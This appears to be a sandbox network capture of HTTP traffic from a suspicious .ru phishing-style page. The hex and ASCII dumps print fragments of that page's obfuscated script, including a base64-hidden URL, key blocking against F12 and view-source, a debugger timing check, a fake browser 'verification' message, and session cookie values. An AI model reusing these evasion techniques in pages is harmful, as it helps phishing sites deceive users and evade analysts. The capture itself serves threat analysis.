                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:19 UTC1214INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:19 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Cache-Control: no-cache, private
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bV6f%2BKVS1o%2BleeGe62CWsM7w99M84msoxw5IT86SGCJlMJoXywfbO4eTgc2PyPK79OmJiJRItq1VtwLPms47NlmBdxfFYU4mMmWmSEIQl5jHsdezTes2ZW1RrE2ZJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=4889&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1570&delivery_rate=570284&cwnd=226&unsent_bytes=0&cid=f01979f51d1061d3&ts=194&x=0"
                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6ImgyWmdXNHpUYWZIRmo0YXNId1paT3c9PSIsInZhbHVlIjoiMldPai9UVzZ6cEZrUTBzbC9zNWhsUHFOYnlCelZVaFh5SHQ2amdEaTl2ckI5UjN6N1JveGk3S1k4TEpURTlQZDlrbW9tMG1LVXVRc3c4VVk4SGVKVHcxc2RLQUNML2ZuM0Qyb1pscWNyWG9YWW4yUG5Gbjk0em9OVVFZYzNhMWUiLCJtYWMiOiIzZGY5YjRlMWU2Njc4MjY1MTk2YTNhNmZiMDhhNTQ0ZDkzMzdiNmMxYzk2Y2M3N2ExYjcwN2I0MzI0MzlkNGY3IiwidGFnIjoiIn0%3D; expires=Tue, 26-Nov-2024 01:28:19 GMT; Max-Age=7200; path=/; secure; samesite=none
                                  2024-11-25 23:28:19 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 6f 76 4e 30 78 75 4e 6b 46 73 4d 6b 70 54 52 54 6c 36 4f 47 70 54 56 47 68 4f 65 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 46 41 77 63 32 46 42 59 6b 77 76 62 53 74 4c 59 6c 5a 48 4e 6e 4d 32 64 6c 42 52 52 55 68 79 5a 47 35 52 4d 6e 51 33 62 54 64 51 56 48 4a 6a 56 31 59 33 4e 56 46 72 4e 57 5a 44 63 7a 49 32 57 6b 68 4d 56 44 46 44 4d 7a 6c 50 57 57 4a 71 63 6e 64 57 52 45 70 69 4d 46 42 56 4e 6d 45 30 65 44 6c 6e 56 45 39 73 4c 30 74 36 63 48 45 31 61 57 4a 30 63 46 68 45 5a 56 41 30 52 6d 59 30 56 30 74 56 65 6a 52 6d 4d 48 70 32 61 33 49 78 61 57 4a 6c 63 55 56 36 51 32 6c 70 59 32 52 4b 4e 6e 5a 6c 64 33 4a 74 4e 6e 4d
                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImovN0xuNkFsMkpTRTl6OGpTVGhOeEE9PSIsInZhbHVlIjoidFAwc2FBYkwvbStLYlZHNnM2dlBRRUhyZG5RMnQ3bTdQVHJjV1Y3NVFrNWZDczI2WkhMVDFDMzlPWWJqcndWREpiMFBVNmE0eDlnVE9sL0t6cHE1aWJ0cFhEZVA0RmY0V0tVejRmMHp2a3IxaWJlcUV6Q2lpY2RKNnZld3JtNnM
                                  2024-11-25 23:28:19 UTC1369INData Raw: 34 63 37 61 0d 0a 3c 21 2d 2d 20 54 72 79 20 6e 6f 74 20 74 6f 20 62 65 63 6f 6d 65 20 61 20 6d 61 6e 20 6f 66 20 73 75 63 63 65 73 73 2e 20 52 61 74 68 65 72 20 62 65 63 6f 6d 65 20 61 20 6d 61 6e 20 6f 66 20 76 61 6c 75 65 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 75 73 75 61 6c 6c 79 20 63 6f 6d 65 73 20 74 6f 20 74 68 6f 73 65 20 77 68 6f 20 61 72 65 20 74 6f 6f 20 62 75 73 79 20 74 6f 20 62 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 74 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 34 59 54 5a 69 4e 79 35 78 64 6e 70 71 65 57 31 74 62 53 35 79 64 53 39 50 4d 31 6c 44 52 55 6b 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e
                                  Data Ascii: 4c7a... Try not to become a man of success. Rather become a man of value. -->... Success usually comes to those who are too busy to be looking for it. --><script>if(atob("aHR0cHM6Ly84YTZiNy5xdnpqeW1tbS5ydS9PM1lDRUkv") == "nomatch"){document.
                                  2024-11-25 23:28:19 UTC1369INData Raw: 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 64 30 5a 49 62 56 68 69 62 47 52 6a 53 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 64 47 53 47 31 59 59 6d 78 6b 59 30 67 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 55 79 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f
                                  Data Ascii: NXJlbTt9DQp9DQojd0ZIbVhibGRjSCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3dGSG1YYmxkY0guY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTUycHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDo
                                  2024-11-25 23:28:19 UTC1369INData Raw: 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67
                                  Data Ascii: icsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAg
                                  2024-11-25 23:28:19 UTC1369INData Raw: 64 59 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 31 59 57 74 73 52 47 70 5a 51 31 70 57 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 31 59 57 74 73 52 47 70 5a 51 31 70 57 49 43 30 67 62 6c 68 42 65 6b 74 50 52 33 70 48 57 43 41 2b 49 47 64 70 55 55 68 54 63 57 35 48 53 32 4d 67 4a 69 59 67 49 55 70 53 63 31 4e 6b 57 46 4a 52 51 55 38 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 45 70 53 63 31 4e 6b 57 46 4a 52 51 55 38 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49
                                  Data Ascii: dYID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCB1YWtsRGpZQ1pWID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmICh1YWtsRGpZQ1pWIC0gblhBektPR3pHWCA+IGdpUUhTcW5HS2MgJiYgIUpSc1NkWFJRQU8pIHsNCiAgICAgICAgICAgIEpSc1NkWFJRQU8gPSB0cnVlOw0KI
                                  2024-11-25 23:28:19 UTC1369INData Raw: 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 52 47 39 47 5a 58 4e 34 61 57 46 45 52 43 49 2b 44 51 70 44 62 32 35 6b 64 57 4e 30 61 57 35 6e 49 48 5a 6c 63 6d 6c 6d 61 57 4e 68 64 47 6c 76 62 69 42 6a 61 47 56 6a 61 33 4d 67 62 32 34 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 49 47 5a 76 63 69 42 7a 59 57 5a 6c 64 48 6b 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32
                                  Data Ascii: sdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iRG9GZXN4aWFERCI+DQpDb25kdWN0aW5nIHZlcmlmaWNhdGlvbiBjaGVja3Mgb24geW91ciBicm93c2VyIGZvciBzYWZldHkuDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2
                                  2024-11-25 23:28:19 UTC1369INData Raw: 59 58 52 68 4b 45 74 54 55 6c 46 6f 57 46 46 6a 61 56 49 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c 63 33 4d 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 73 62 32 46 6b 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59
                                  Data Ascii: YXRhKEtTUlFoWFFjaVIpDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nlc3MnKXsNCiAgICAgICAgbG9jYXRpb24ucmVsb2FkKCk7DQogICAgICAgIH0NCiAgICAgICAgaWY
                                  2024-11-25 23:28:19 UTC1369INData Raw: 4f 6b 6f 4d 6f 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 6f 42 4e 62 49 45 4a 41 47 48 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 6f 42 4e 62 49 45 4a 41 47 48 2e 70 61 74 68 6e 61 6d 65 20 3d 20 6f 42 4e 62 49 45 4a 41 47 48 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 73 5a 47 64 6e 6b 53 6c 4d 55 20 3d 20 6f 42 4e 62 49 45 4a 41 47 48 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 73 5a 47 64 6e 6b 53 6c 4d 55 20 3d 3d 20 7a 74 52 68 62 4f 6b 6f 4d 6f 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77
                                  Data Ascii: OkoMo = window.location.pathname.split('%23')[0].split('%3F')[0];if (oBNbIEJAGH.pathname.endsWith('/')) {oBNbIEJAGH.pathname = oBNbIEJAGH.pathname.slice(0, -1);}const sZGdnkSlMU = oBNbIEJAGH.pathname+'/';if(sZGdnkSlMU == ztRhbOkoMo){document.w
                                  2024-11-25 23:28:19 UTC1369INData Raw: 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 64 30 5a 49 62 56 68 69 62 47 52 6a 53 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 64 47 53 47 31 59 59 6d 78 6b 59 30 67 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 55 79 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67
                                  Data Ascii: XJlbTt9DQp9DQojd0ZIbVhibGRjSCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3dGSG1YYmxkY0guY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTUycHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDog
                                  2024-11-25 23:28:19 UTC1369INData Raw: 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b
                                  Data Ascii: csIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgK


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.44974323.218.208.109443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:19 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  Accept-Encoding: identity
                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                  Range: bytes=0-2147483646
                                  User-Agent: Microsoft BITS/7.8
                                  Host: fs.microsoft.com
                                  2024-11-25 23:28:19 UTC534INHTTP/1.1 200 OK
                                  Content-Type: application/octet-stream
                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                  ApiVersion: Distribute 1.1
                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                  Cache-Control: public, max-age=36290
                                  Date: Mon, 25 Nov 2024 23:28:19 GMT
                                  Content-Length: 55
                                  Connection: close
                                  X-CID: 2
                                  2024-11-25 23:28:19 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.449744151.101.2.1374432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:21 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                  Host: code.jquery.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://8a6b7.qvzjymmm.ru/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:21 UTC613INHTTP/1.1 200 OK
                                  Connection: close
                                  Content-Length: 89501
                                  Server: nginx
                                  Content-Type: application/javascript; charset=utf-8
                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                  ETag: "28feccc0-15d9d"
                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                  Access-Control-Allow-Origin: *
                                  Cross-Origin-Resource-Policy: cross-origin
                                  Via: 1.1 varnish, 1.1 varnish
                                  Accept-Ranges: bytes
                                  Age: 2559376
                                  Date: Mon, 25 Nov 2024 23:28:21 GMT
                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740036-EWR
                                  X-Cache: HIT, HIT
                                  X-Cache-Hits: 5889, 0
                                  X-Timer: S1732577301.289662,VS0,VE1
                                  Vary: Accept-Encoding
                                  2024-11-25 23:28:21 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                  2024-11-25 23:28:21 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                  2024-11-25 23:28:21 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                  2024-11-25 23:28:21 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                  2024-11-25 23:28:21 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
